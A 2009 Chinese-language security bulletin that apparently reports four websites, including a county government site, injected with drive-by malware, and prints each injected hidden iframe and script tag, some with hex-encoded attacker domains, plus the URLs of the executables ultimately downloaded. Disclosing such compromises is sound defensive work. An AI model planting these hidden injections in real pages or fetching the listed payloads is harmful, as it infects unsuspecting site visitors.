2009年4月3日挂马简报

　　2009年4月3日捕获以下网站被植入恶意代码：成都特嘉科技有限公司、成安县党政权力公开透明运行网、中国民俗网、厦工(三明)重型机器有限公司、　　成都特嘉科技有限公司（hxxp://www.cdtejia.com/）被植入 ...

　　2009年4月3日捕获以下网站被植入恶意代码：成都特嘉科技有限公司、成安县党政权力公开透明运行网、中国民俗网、厦工(三明)重型机器有限公司、

　　成都特嘉科技有限公司（hxxp://www.cdtejia.com/）被植入恶意代码：
　　<iframe src=hxxp://www.abcdaf.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%62%62%67%31%2E%63%6E></script>
　　<iframe src=hxxp://www.hao3956.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.good7389.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.good1685.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.good0632.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.love2068.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.miss1096.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.miss2225.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%62%62%67%33%2E%63%6E></script>
　　<iframe src=hxxp://www.bg6119.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.bg8028.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%62%62%67%38%2E%63%6E></script>
　　<iframe src=hxxp://www.yd6699.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%63%63%6A%33%2E%63%6E></script><iframe src=hxxp://www.llxm5566.cn/b3.htm width=50 height=0 border=0></iframe>
　　<iframe src=hxxp://www.sj5690.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%63%63%6A%37%2E%63%6E></script>
　　<iframe src=hxxp://www.bb1166.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%71%77%72%31%2E%63%6E></script>

　　通过漏洞攻击，最终下载病毒：
　　hxxp://d9.456363.com/09/e.exe
　　hxxp://d3.456363.com/03/Baidu.cab

　　成安县党政权力公开透明运行网（hxxp://qlgk.ca.hd.gov.cn/）被植入恶意代码：
　　<script src=hxxp://%63%63%6A%37%2E%63%6E></script>
　　<iframe src=hxxp://www.bb1166.cn/b3.htm width=50 height=0 border=0></iframe>
　　<script src=hxxp://%71%77%72%31%2E%63%6E></script>

　　通过漏洞攻击，最终下载病毒：
　　hxxp://d9.456363.com/09/e.exe
　　hxxp://d3.456363.com/03/Baidu.cab
　　中国民俗网（hxxp://www.chinesefolklore.com/）被植入恶意代码：
　　<iframe src=”hxxp://%77%77%77%2E%68%75%6F%68%75%30%30%38%2E%63%6E/1.htm” width=100 height=0></iframe>

　　通过漏洞攻击，最终下载病毒：
　　hxxp://d9.456363.com/09/e.exe
　　hxxp://d3.456363.com/03/Baidu.cab
　
　厦工(三明)重型机器有限公司（hxxp://www.sahm.cn/）被植入恶意代码：
　　<script src=hxxp://3b3.org/c.js></script>
　　通过漏洞攻击，最终下载病毒：
　　hxxp://9ke8.com/xia/f1.css

关键字：挂马简报